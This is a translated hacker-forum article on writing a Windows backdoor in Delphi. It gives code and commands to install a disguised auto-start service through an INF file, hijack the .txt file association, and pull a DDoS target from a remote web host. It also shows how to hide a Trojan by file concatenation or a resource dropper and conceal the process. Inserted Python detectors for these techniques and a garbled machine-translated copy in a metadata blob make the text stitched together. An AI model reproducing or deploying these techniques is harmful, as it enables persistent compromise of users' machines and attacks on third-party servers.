Foreword
There are many backdoor programs around now, but most of them share one problem: the way they load with the system is easily noticed by an experienced user, and once they run into a firewall such as “Skynet” or “Jinshan network Dart” it is basically over. A few days ago I read an online article called “Do all in cmd shell”; the way it loads its program is rather clever and works across NT/2000/XP systems. Here I use Delphi to imitate some of the features of classic backdoor software and write a virus, hoping to exchange programming experience with you all; it can also be seen as a review of previously learned material :)
System load
Reading this far, many friends will immediately think of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and the Load= line in Win.ini. Yes, but from a practical standpoint such startup methods are now a little behind the times. If your program implements a lot of features but falls at the startup step, isn't that depressing? Following the ideas of the author of “Do all in cmd shell”, we can write an inf file and use it to register a system service, so that our backdoor starts together with the system services without anyone noticing. This scheme has a limitation: it only applies to NT/2000/XP. Here is a quote from the original author:
Now, let's use an inf to add a system service:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=provides on the Internet Information Services Management Support.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
Save this as inetsvr.inf, then run:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %systemroot%\system32\inetsvr.inf
(here I made a small modification to the original)
[Note: %systemroot% is an environment variable. If your system folder is C:\Windows, then %systemroot% is C:\Windows (generally 98 or XP); if your system folder is C:\winnt, then %systemroot% is C:\winnt (2K).]
This example adds a service named inetsvr. Doesn't it look just like a service that comes with the system?
Some points to note:
1. The last four items are:
Service type: 0x10 for a service running in its own process, 0x20 for a service sharing a process, such as svchost.
Start type: 0 loaded at system boot, 1 loaded at OS initialization, 2 started automatically by the SCM (Service Control Manager), 3 manual start, 4 disabled. Note that 0 and 1 can only be used for drivers.
Error control: 0 ignore, 1 continue with a warning, 2 switch to the LastKnownGood configuration, 3 blue screen.
Service binary location: %11% is the system32 directory, %10% is the system directory (WINNT or Windows), %12% is the driver directory system32\drivers. For other values see the DDK. You can also skip the variables and write the full path directly.
These four items are required.
2. Besides the six items in the example there are others such as LoadOrderGroup and Dependencies; they are not commonly used, so they are not described here.
3. The two commas after inetsvr are there because the flags parameter between them, which is rarely used, is omitted.
To delete a service:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
DelService=inetsvr
Very simple, isn't it?
The next step is to call this inf from Delphi to install the service. We can use the ShellExecute function (from the ShellAPI unit); the command goes in the file parameter and its arguments in the parameters parameter:
ShellExecute(Handle, nil, 'rundll32.exe', 'setupapi,InstallHinfSection DefaultInstall 128 %systemroot%\system32\inetsvr.inf', nil, SW_SHOWNORMAL);
I think SW_SHOWNORMAL here is not ideal, because with this parameter the cmd shell window is visible; does anyone know a better way? However, ShellExecute has one benefit: if the inf cannot be found, nothing at all appears on screen, in other words there is no error message. Of course, if that does not reassure you, you can also use the GetWindowsDirectory function to build the absolute path to the inf file, but I do not think it is necessary here.
Doubts: the ServiceType=0x10 we use here is an own-process service. I expect that when the virus accesses the Internet it will be blocked by the firewall, whereas shared-process services such as svchost and lsass are not. If we set ServiceType to 0x20 I think the situation may change, but I have not studied this in depth.
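From a defender's side, the same INF syntax is what a triage analyst sees in a dropped .inf or in the setupapi logs. The following Python script is an added example, not code from the article: it parses an INF, follows each AddService directive to its install section, decodes ServiceType/StartType/ErrorControl with the meanings listed in the notes above, and expands the %10%/%11%/%12% directory ids (assumed here to resolve under C:\Windows). The sample INF is the article's own inetsvr.inf.

```python
import re
from typing import Dict, List

# Meaning of the numeric fields, taken from the article's "points to note".
SERVICE_TYPES = {0x10: "own process", 0x20: "shared process"}
START_TYPES = {0: "boot (drivers only)", 1: "system (drivers only)", 2: "auto", 3: "manual", 4: "disabled"}
ERROR_CONTROLS = {0: "ignore", 1: "continue with warning", 2: "switch to LastKnownGood", 3: "blue screen"}
# Directory ids the article lists (%10%, %11%, %12%); assumed to resolve under C:\Windows.
DIRIDS = {"10": r"C:\Windows", "11": r"C:\Windows\system32", "12": r"C:\Windows\system32\drivers"}


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Split INF text into {section name (lower-case): [lines]}, dropping comments and blanks."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts an INF comment
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _keyvals(lines: List[str]) -> Dict[str, str]:
    out = {}
    for line in lines:
        if "=" in line:
            k, v = line.split("=", 1)
            out[k.strip().lower()] = v.strip().strip('"')
    return out


def _int(value, default: int = 0) -> int:
    try:
        return int(value, 0)          # base 0 accepts both "2" and "0x10"
    except (TypeError, ValueError):
        return default


def expand_dirid(path: str) -> str:
    m = re.match(r"%(\d+)%(.*)", path)
    return DIRIDS[m.group(1)] + m.group(2) if m and m.group(1) in DIRIDS else path


def extract_services(text: str) -> List[dict]:
    """One dict per AddService directive found in any *.Services section."""
    sections = parse_inf(text)
    services = []
    for name, lines in sections.items():
        if not name.endswith(".services"):
            continue
        for line in lines:
            if not line.lower().startswith("addservice"):
                continue
            # AddService=ServiceName,[flags],service-install-section[,event-log-section...]
            fields = [f.strip() for f in line.split("=", 1)[1].split(",")]
            install = _keyvals(sections.get(fields[2].lower(), [])) if len(fields) > 2 else {}
            services.append({
                "name": fields[0],
                "flags": _int(fields[1]) if len(fields) > 1 else 0,
                "display_name": install.get("displayname", ""),
                "service_type": _int(install.get("servicetype")),
                "start_type": _int(install.get("starttype")),
                "error_control": _int(install.get("errorcontrol")),
                "binary": expand_dirid(install.get("servicebinary", "")),
            })
    return services


def review(text: str) -> List[str]:
    """Readable findings for a triage analyst: what the INF would register, plus oddities."""
    findings = []
    for s in extract_services(text):
        findings.append(
            f"{s['name']}: '{s['display_name']}' -> {s['binary']} "
            f"[{SERVICE_TYPES.get(s['service_type'], hex(s['service_type']))}, "
            f"start={START_TYPES.get(s['start_type'], s['start_type'])}, "
            f"error={ERROR_CONTROLS.get(s['error_control'], s['error_control'])}]"
        )
        if s["service_type"] in SERVICE_TYPES and s["start_type"] in (0, 1):
            findings.append(f"{s['name']}: Win32 service with a driver-only start type (invalid)")
        if s["start_type"] == 2 and s["service_type"] in SERVICE_TYPES:
            findings.append(f"{s['name']}: auto-start service; verify the binary {s['binary']} is expected")
    return findings


# Constructed sample: the article's inetsvr.inf, verbatim.
SAMPLE_INF = """[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=provides on the Internet Information Services Management Support.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\\inetsvr.exe
"""

if __name__ == "__main__":
    for line in review(SAMPLE_INF):
        print(line)
```

An auto-start own-process service in system32 with a Windows-sounding display name is exactly what the article is after, so the script resolves and lists the binary for each one. On a live host the same fields are readable with sc qc <name> or under HKLM\SYSTEM\CurrentControlSet\Services, and the listed binary should be compared against what is actually on disk.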
File Association
Following the usual practice, we can modify the txt file association in the registry so that its key value points at our backdoor. The code below does this :)
// Requires the Windows, SysUtils and Registry units.
var
  Backdoor: TRegistry;
  FileExt: String;
  FileType: String;
  FileDescription: String;
  ExecName: String;
  WinDir: String;
begin
  FileExt := '.txt';
  FileType := 'text documents';
  FileDescription := 'text documents';
  SetLength(WinDir, 128); // get the Windows directory
  GetWindowsDirectory(PChar(WinDir), 128);
  SetLength(WinDir, StrLen(PChar(WinDir)));
  ExecName := WinDir + '\system32\inetsvr.exe'; // inetsvr.exe is our virus program
  Backdoor := TRegistry.Create; // create the registry object
  try
    Backdoor.RootKey := HKEY_CLASSES_ROOT; // registry root key
    if not Backdoor.OpenKey(FileExt, True) then Exit; // creating the extension key failed; usually a registry error
    Backdoor.WriteString('', FileType); // default value: the file type (ProgID)
    Backdoor.CloseKey;
    if not Backdoor.OpenKey(FileType, True) then // open the key for the type FileType
      Exit;
    Backdoor.WriteString('', FileDescription); // default value: the file description
    if not Backdoor.OpenKey('shell\open\command', True) then // open the sub-key (relative to the current key)
      Exit;
    Backdoor.WriteString('', ExecName); // default value: the command run on double-click
    Backdoor.CloseKey; // close the key
  finally
    Backdoor.Free; // free the registry object
  end;
end;
Thus, whenever the user double-clicks a txt file, our inetsvr.exe starts along with it.
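The association hijack above leaves a specific shape in the registry: .txt points at a ProgID whose shell\open\command runs a different executable and, because the snippet writes ExecName alone, never passes the opened file. The following Python script is an added example rather than code from the article: it parses a .reg export (as produced by regedit or reg export), follows the extension to its command the way the shell does, and reports a handler that is not on an allowlist or a command without %1. Both exports are constructed; the hijacked one reflects the Delphi snippet with an assumed Windows directory of C:\Windows, and the notepad.exe allowlist is an assumption made for the demonstration.

```python
import re
from typing import Dict, List, Optional, Tuple

# Handlers we expect for each extension (constructed allowlist for the demonstration).
EXPECTED_HANDLERS = {".txt": {"notepad.exe"}}


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key path (lower-case): {value name: string data}}.
    Only REG_SZ values are kept; '@' is the default value, and regedit doubles backslashes."""
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, data = line.split("=", 1)
        name = "" if name == "@" else name.strip('"')
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            keys[current][name] = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return keys


def command_executable(command: str) -> str:
    """Base name of the executable at the front of a shell command line (quoted or not)."""
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]
    else:
        exe = command.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1]


def resolve_open_command(keys, ext: str) -> Tuple[Optional[str], Optional[str]]:
    """Follow HKCR\\<ext> -> ProgID -> shell\\open\\command, as the shell does on double-click."""
    progid = keys.get(f"hkey_classes_root\\{ext.lower()}", {}).get("")
    if not progid:
        return None, None
    cmd = keys.get(f"hkey_classes_root\\{progid.lower()}\\shell\\open\\command", {}).get("")
    return progid, cmd


def check_association(keys, ext: str) -> List[str]:
    findings = []
    progid, cmd = resolve_open_command(keys, ext)
    if cmd is None:
        return [f"{ext}: no shell\\open\\command reachable (ProgID={progid})"]
    exe = command_executable(cmd)
    if exe.lower() not in EXPECTED_HANDLERS.get(ext.lower(), set()):
        findings.append(f"{ext}: handler '{exe}' (ProgID '{progid}') is not an expected handler")
    if "%1" not in cmd:
        findings.append(f"{ext}: command never receives the document (%1); the double-clicked file is ignored")
    return findings


# Constructed exports. CLEAN_REG is what a stock association looks like; HIJACKED_REG is the
# state the article's Delphi snippet leaves behind (assumed Windows directory C:\Windows).
CLEAN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
"Content Type"="text/plain"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"
'''

HIJACKED_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="text documents"

[HKEY_CLASSES_ROOT\text documents]
@="text documents"

[HKEY_CLASSES_ROOT\text documents\shell\open\command]
@="C:\\Windows\\system32\\inetsvr.exe"
'''

if __name__ == "__main__":
    for label, export in (("clean", CLEAN_REG), ("hijacked", HIJACKED_REG)):
        print(label, check_association(parse_reg_export(export), ".txt") or ["ok"])
```

The missing %1 is the more robust of the two signals: an allowlist has to be maintained per extension, whereas a document handler that drops the document is wrong for any legitimate program. The same walk can be run against a live hive by reading the keys directly instead of parsing an export.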
Attack control
A few days ago I saw an online article that used a bat batch file to control a virus program to attack someone else's website as its example. I have not fully understood that example yet, but we can use another method instead of the bat. Below we implement the process:
First, apply for some web space, say http://www.attack.com/delphiscn, and upload an ipaddress.txt file whose content is 192.168.0.1.
Here 192.168.0.1 is the address of the website we want to attack.
In Delphi, add the following statement:
var ipaddress: string; // a String, since StrToInt cannot parse a dotted address
NMHTTP.Get('http://www.attack.com/Delphiscn/ipaddress.txt');
ipaddress := Trim(NMHTTP.Body);
NMHTTP.Free;
Thus our program obtains the address of the site to attack, and that address is under our own control :)
Next is the attack itself: we can add a piece of code to the program that sends packets to 192.168.0.1 non-stop so that the remote server stops responding, which is the often-mentioned [DDOS](http://www.myhack58.com/Article/60/sort096/Article_096_1.htm). Of course you can also use something like Ping; since it is relatively simple I will not dwell on it.
File hidden
If the program you design is more powerful it may consist of more than one executable file, but we cannot package it with a setup program the way shareware does. The simplest method is the command copy /b setup.exe+run.exe set.exe, which appends the program to be run to the back of a front executable. That front setup.exe then has two jobs: one is to display some harmless content so that nobody realises this is a Trojan installer; the other is to locate the real Trojan at the specified offset in its own file, cut it out, run it and install it. Because the Trojan's service part uses “stealth” techniques it will not be noticed. The code for locating and copying is not detailed here. Another method is to pre-load the Trojan into a resource file (RES), store it as data inside the current executable, and release it at the right moment. The code below releases a specified file from the RES:
// Requires the Windows and SysUtils units.
procedure runvirus(from: PChar; fileto: string);
var
  tempdir: string;
  Buf: Pointer;
  size: LongInt;
  h, ResHandle: Cardinal;
  zip: File;
begin
  h := GetModuleHandle(PChar(ExtractFileName(ParamStr(0)))); // handle of our own module
  tempdir := ''; // release into the current directory
  ResHandle := FindResource(h, MakeIntResource(1), from); // resource id 1 of the custom type named by 'from' (e.g. 'DAT')
  Buf := LockResource(LoadResource(h, ResHandle)); // pointer to the resource bytes
  size := SizeofResource(h, ResHandle);
  AssignFile(zip, tempdir + fileto);
  Rewrite(zip, 1); // untyped file with a record size of 1 byte
  try
    BlockWrite(zip, Buf^, size);
  finally
    CloseFile(zip);
  end;
end;
The resource file test.rc is made as follows:
* Contents: 1 DAT "test.exe"
* Build: BRCC32 test.rc
* In the project source, add the following (in addition to the existing {$R *.DFM} line):
// Link test.RES; without this line the Trojan gets a "resource not found" error when it is released, so be sure to watch for this :)
{$R test.RES}
* Function call:
if not FileExists('test.exe') then runvirus('DAT', 'test.exe');
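The copy /b trick described above leaves a tell: the combined file carries a complete PE image in its overlay, the bytes after the last section of the front executable. The following Python script is an added example, not code from the article, that computes where a PE image's section data ends and then scans the overlay for further well-formed PE headers. It builds its own minimal, non-loadable PE images to stand in for setup.exe and run.exe (constructed stand-ins, since no real binaries are embedded) and does not cover the resource-based variant, which would require walking the resource directory instead.

```python
import struct
from typing import List, Optional, Tuple


def pe_image_end(data: bytes) -> Optional[int]:
    """Offset where the PE image's section data ends (start of any overlay), or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]      # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]      # COFF SizeOfOptionalHeader
    sec_table = e_lfanew + 24 + opt_size
    end = sec_table + nsections * 40                                 # at least the end of the headers
    for i in range(nsections):
        off = sec_table + i * 40
        if off + 40 > len(data):
            return None
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)  # SizeOfRawData, PointerToRawData
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def find_appended_executables(data: bytes) -> List[Tuple[int, int]]:
    """(offset, length) of every well-formed PE image found in the overlay of `data`."""
    hits = []
    pos = pe_image_end(data)
    if pos is None:
        return hits
    while pos < len(data):
        idx = data.find(b"MZ", pos)
        if idx < 0:
            break
        inner_len = pe_image_end(data[idx:])
        if inner_len is None:
            pos = idx + 2                      # stray "MZ" bytes; keep scanning
        else:
            hits.append((idx, inner_len))
            pos = idx + inner_len              # skip past the embedded image
    return hits


def build_minimal_pe(payload: bytes) -> bytes:
    """Constructed stand-in for a real executable: DOS stub, PE signature, COFF header,
    an (unused) optional header and one section holding `payload`. Only the fields the
    detector reads are meaningful; the result is not loadable."""
    e_lfanew, opt_size = 0x40, 0x60
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    headers_len = e_lfanew + 4 + len(coff) + opt_size + 40
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF                       # 512-byte file alignment
    section = struct.pack("<8sIIII", b".text", len(payload), 0x1000, len(payload), raw_ptr) + b"\0" * 16
    image = dos + b"PE\0\0" + coff + opt + section
    return image + b"\0" * (raw_ptr - len(image)) + payload


# Constructed inputs: a plain image and the result of `copy /b front.exe+hidden.exe combined.exe`.
FRONT = build_minimal_pe(b"front program body".ljust(100, b"\0"))
HIDDEN = build_minimal_pe(b"hidden program body".ljust(50, b"\0"))
COMBINED = FRONT + HIDDEN

if __name__ == "__main__":
    print("front only  :", find_appended_executables(FRONT))
    print("concatenated:", find_appended_executables(COMBINED))
```

Overlays by themselves are normal (installers and signed files carry them), so the finding worth acting on is an overlay that is itself an executable. A response workflow would then carve the inner image at the reported offset and analyse it separately.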
In addition, here are a few more common tips:
Invisible in Task Manager:
We can use the method of clearing the title:
program Project1;
uses
  Forms,
  Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
begin
  // clear the title here
  Application.Title := '';
  Application.Initialize;
  Application.CreateForm(TForm1, Form1);
  Application.Run;
end.
Invisible on the taskbar:
Use the SetWindowLong function:
SetWindowLong(Application.Handle, GWL_EXSTYLE, WS_EX_TOOLWINDOW);
To prevent the program from repeatedly running:
When providing a service on a port, we often need to prevent the program from being run more than once, because two copies running at the same time would use the same IP address and port and inevitably conflict. To prevent a second execution, we can add the following code to the program's startup:
Suppose our program's title is Neverland:
program Neverland;
uses
  Forms, Windows, SysUtils,
  Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var
  hMutex: THandle;
  Ret: DWORD;
begin
  Application.Initialize;
  Application.Title := 'Neverland';
  // create a named mutex; a second copy finds that it already exists
  hMutex := CreateMutex(nil, False, 'Neverland');
  Ret := GetLastError;
  if Ret <> ERROR_ALREADY_EXISTS then
  begin
    Application.CreateForm(TForm1, Form1);
    Application.Run;
  end
  else
    ReleaseMutex(hMutex); // another instance is already running; give it up and exit
end.
{"type": "myhack58", "references": [], "href": "http://www.myhack58.com/Article/html/3/62/2006/12420.htm", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "edition": 1, "viewCount": 4, "id": "MYHACK58:62200612420", "published": "2006-10-21T00:00:00", "lastseen": "2016-11-13T18:16:26", "reporter": "\u4f5a\u540d", "modified": "2006-10-21T00:00:00", "title": "On the development of the system of back door software a few ideas-vulnerability warning-the black bar safety net", "description": "Foreword \nNow the system of back door software are numerous, but most of them have one common problem, that is, the system load is very easy to be savvy veterans are perceived. And met like\u201cSkynet\u201dor\u201cJinshan network Dart\u201dnetwork _blank\">firewall basically it's over. The other day in the online saw a an article called the Do all in cmd shell on the article inside about the program loaded comparison clever, based on NT 2 0 0 0\\XP-so the system basically can already do General. In this I used Delphi, and mimic some of the classic Backdoor software functionality to write a Virus, I hope with you master common AC programming experience, can be considered to review previously learned knowledge:\uff09\n\nSystem load \nRead to here, estimated that many friends will immediately associate HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run and Win. ini in the Load. Yes, but from the practical standpoint, now and then with such a start has been a little behind. And if your program achieve a lot of features, but if in the start aspect out of the question, not a depressing thing? In this case, according to the Do all in cmd shell of the author's ideas, we can write an inf file, use this file to configure a system service program. 
Thus, our Backdoor can unknowingly with the system service start together. But this scheme has a limitation: only applies to NT\\2 0 0 0\\XP here is a quote the author of the original:\n\nNow, let's use inf to add a system service \n[Version] \nSignature=\"$WINDOWS NT$\" \n[DefaultInstall. Services] \nAddService=inetsvr,,My_AddService_Name \n[My_AddService_Name] \nDisplayName=Windows Internet Service \nDescription=provides on the Internet Information Services Management Support. \nServiceType=0x10 \nStartType=2 \nErrorControl=0 \nServiceBinary=%11%\\inetsvr.exe \nSave for the inetsvr. inf, and then \nrundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\\system32\\inetsvr. inf in here I original made a point modified \n[Note: the%systemroot%is an environment variable assuming your system folder is C:\\Windows, then the%systemroot%path is C:\\Windows General 9 8 or XP, assuming your system folder is C:\\winnt, then the%systemroot%path to C:\\winnt for 2K] \nThis example adds a named inetsvr the service is not very like the system comes with the service, Oh on. \nSome points to note: \n1, The last four items are \nService type: 0x10 as an independent process services, 0x20 for shared process services such as svchost; and \nStartup Type: 0 system boot time loading, 1 OS initialization when loaded, and 2 by the SCM, the Service Control Manager to automatically start \nAction, 3 manual start, 4 disabled. \nNote that 0 and 1 can only be used for drivers \nError control: 0 to ignore, 1 to continue and warning that 2 To switch to the LastKnownGood settings, 3 blue screen. \nService program location:%1 1% represents the system32 directory%1 0% indicates that the system directory(WINNT or Windows),% \n1 2% of the drive directory system32\\drivers and. Other values, see the DDK for. You can also needless to variables directly using the full path \nPath. \nThis fourth item is a must have. 
\n2, In addition to the examples of the six projects, there are LoadOrderGroup And Dependencies, etc. Not commonly used so no description \n. \n3, The inetsvr behind the two commas, because the middle is omitted not a commonly used parameter flags. \nTo delete a service: \n[Version] \nSignature=\"$WINDOWS NT$\" \n[DefaultInstall. Services] \nDelService=inetsvr \nVery simple, isn't it?\n\nThe following step is to in Delphi calls this inf installation services. We can use the shellExecute function, the specific usage of \nshellExecute(handle,nil,pchar('rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\\system32\\inetsvr. inf'),nil,nil,sw_shownormal); \nI think here sw_shownormal a little not very good, because in this parameter. cmd shell window is visible, don't know you Is there any better way? However, I think the shellExecute function has a benefit-------if the application cannot find the inf, on a computer screen does not have any reflection. Simply put, it is not the message fault: of course, if you are not assured that you can also use the GetWindowsDirectory function to the inf file for the absolute positioning, but here I feel as if none of this is necessary. \nDoubts: here we are sharing type ServiceType=0x10 belonging to the independent process services. It is estimated that the virus to access the Internet would be subjected _blank\">firewall blocker. But like similar svchost and lsass such a shared process services but will not, if we take the ServiceType value to 0x20 I think the situation will change, but here I have no in-depth study.\n\nFile Association \nIn accordance with the usual practice, we can txt associated text to be modified, the registry key value to point to our backdoors. The code below can do this:\uff09 \nvar \nTrojan: TRegistry; \nFileExt:String; \nFileType:String; \nFileDescription:String; \nExecName:String; \nWinDir:String; \nbegin \nFileExt:='. 
txt'; \nFileType:='text documents'; \nFileDescription:='text documents';\n\nSetLength(WinDir,1 2 8);//get the Windows directory \nGetWindowsDirectory(PChar(WinDir),1 2 8); \nSetLength(WinDir,StrLen(PChar(WinDir))); \nExecName:=WinDir+'\\system32\\inetsvr.exe';//here the inetsvr. exe our virus program\n\nTrojan:=TRegistry. Create;//Create the registry object \ntry \nBackdoor. RootKey:=HKEY_CLASSES_ROOT;//registry root key \nif not Backdoor. OpenKey(FileExt, True) then Exit; //when created in the registry file types fail when you quit, generally is a registry error \nBackdoor. WriteString(\",FileType);//write the file type of the data \nBackdoor. CloseKey;\n\nif not Backdoor. OpenKey(FileType,True) then//open file of type FileType keyword \nExit; \nBackdoor. WriteString(\",FileDescription);//write the file description data \nif not Backdoor. OpenKey('shell\\open\\command', True) then//open the sub-key \nExit; \nBackdoor. WriteString(\",ExecName); \nBackdoor. CloseKey;//close the keyword \nfinally \nBackdoor. Free;//Free the registry object \nend; \nend; \nThus, as long as the user double-clicks a txt file, our inetsvr. exe will also follow start.\n\nAttack control \nFew days ago on the Internet saw an article about using bat batch file to control the virus program to attack others website for an example. Since I was the one that the instance is not yet fully clear, but we can use other way to instead of the bat. Below we come to realize this process: \nFirst, you can apply for a home space that is http://www. attack. com/delphiscn it. Upload an ipaddress. txt document. The content of the 1 9 2. 1 6 8. 0. 1 \nHere the 1 9 2. 1 6 8. 0. 1 is we want to attack the website address. \nIn Delphi, add the following statement: \nvar ipaddress:integer; \nNMhttp. Get('http://www.attack.com/Delphiscn/ipaddress.txt'); \nipaddress:=strtoint(NMhttp. Body); \nNMhttp. 
Free; \nThus, our program got to attack the site address IPaddress and the IPAddress by our own control:\uff09 \nThe next is concerned to attack, we can be in the program added a piece of code. To 1 9 2. 1 6 8. 0. 1 non-stop to send data packets. Cause the remote server refused to respond, which is often mentioned[DDOS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>a). Of course you can also use a similar Ping such a method, due to the relatively simple, there is no longer dwell. \n\nFile hidden \nIf you design The program function more powerful, maybe more than one executable file, but we can not be like other shared software to do the setup. One of the most simple method is to use copy/b setup.exe+run.exe set. exe command the need to run the program loaded in the front an executable program behind the setup. the exe file functions there are two, one is to display the artifacts so others don't know this is a Trojan installer, whichThe second is the real object from the specified word length locate the Trojan program to intercept down and run installed, due to Trojan services section uses\u201cstealth\u201dtechnology, so there will not be perceived, the code portion is to locate the copy here is not fine. There is a method in the resource file RES, pre-loaded Trojans, and in the form of data stored in the current executable file, in the right moment to release. The code below can be used from the RES to release the specified file: \nprocedure runvirus(from:pchar;FiletString); \nvar \ntempdir:string; \nBuf:pointer; \nsize:longint; \nh,ResHandle:Cardinal; \nzip:File; \nbegin \nh:=GetModuleHandle(pchar(extractFilename(paramstr(0)))); \ntempdir:=\"; \nreshandle:=FindResource(h,Makeintresource(1),'DAT'); \nbuf:=Pointer(loadresource(h,reshandle)); \nsize:=SizeofResource(h,reshandle); \nassignfile(zip,tempdir+fileto); \nrewrite(zip,1); \ntry \nblockwrite(zip,buf^,size) \nfinally \nclosefile(zip); \nend; \nend; \nResource file test. 
rc made as follows: \n* Contents: 1 DAT \"test.exe\" \n* Production: BRCC32 test. rc \n* In the resource file by adding: \n{$R *. DFM} \n//Added to test. RES, if not this line, when the Trojan is released when the file can't find resources error message, be sure to pay attention to this problem:\uff09 \n{$R test. RES} \n* Function calls: \nif not Fileexists('test.exe') then runvirus('DAT','test.exe'); \nIn addition, attach a few of the more common tips: \nThe Task Manager in the invisible: \nWe can use the clear title of the method: \nprogram Project1; \nuses \nForms, \nUnit1 in 'Unit1. pas' {Form1}; \n{$R *. RES} \nbegin \n//Set here title clear \nAppilcation. Title:=\"; \nApplication. Initialize; \nApplication. CreateForm(TForm1,Form1); \nApplication. Run; \nend. \nOn the toolbar invisible: \nBy using the SetWindowLong function to: \nSetWindowLong(Application,Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW); \nTo prevent the program from repeatedly running: \nIn making use of port services, often to prevent a program executed repeatedly, because the same parts of the copy at run time will use the same IP address and same port, will inevitably produce conflict. So, in order to prevent program secondary execution. We can be in the program startup event add the following code: \nSuppose we program the title to Neverland \nprogram Neverland; \nuses \nForms,Windows,SysUtils, \nNeverland-in 'Neverland. pas' {Form1}; \n{$R *. RES} \nvar \nhMutex:HWND; \nRet:Integer; \nBegin \nApplication. Initialize; \nApplication. Title:='Neverland'; \nhMutex:=CreateMutex(nil,False,'Neverland'); \nRet:=GetLastError; \nIF Ret<>ERROR_ALREADY_EXISTS Then \nBegin \nApplication. CreateForm(TForm1, Form1); \nApplication. Run; \nEnd \nElse \nReleaseMutex(hMutex); \nend", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645413866, "score": 1659770509}}